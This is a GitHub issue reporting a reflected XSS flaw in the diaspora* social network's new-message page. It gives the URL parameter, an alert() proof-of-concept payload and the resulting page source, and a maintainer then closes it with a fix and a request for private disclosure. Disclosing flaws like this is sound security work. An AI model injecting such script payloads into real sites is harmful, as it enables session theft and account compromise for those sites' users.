Reflected XSS Vulnerability #4010

Closed
BitBitmap opened this Issue Feb 26, 2013 · 1 comment

2 participants

@BitBitmap

There's a reflected XSS in the window where you send a message to another user.

The URL path is /conversations/new?contact_id=XXX&name= where XXX is a valid contact_id. You can add

</script><script>alert(1);</script>

to name= to execute a reflected XSS attack.

The source would look like this after the XSS:

<script>
  $(document).ready(function () {
    var data = $.parseJSON( "[{\"value\":1719514,\"name\":\"test test\"}]" ),
        autocompleteInput = $("#contact_autocomplete");

    autocompleteInput.autoSuggest(data, {
      selectedItemProp: "name",
      searchObjProps: "name",
      asHtmlID: "contact_ids",
      retrieveLimit: 10,
      minChars: 1,
      keyDelay: 0,
      startText: '',
      emptyText: 'No Results Found',
      preFill: [{name : "</script><script>alert(1)</script>",
                 value : "1719514"}]
      });
    autocompleteInput.focus();
  });
</script>

If needed, I can replicate this attack for you. This reflected XSS does not work in a few browsers like IE and Google Chrome because of XSS filtering.

@jhass jhass closed this in cf9659d Feb 26, 2013
@jhass
diaspora* social network member

Thank you for notifying us of this.

However for the next time we would welcome a more responsible disclosure via any means of non public communication very much.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment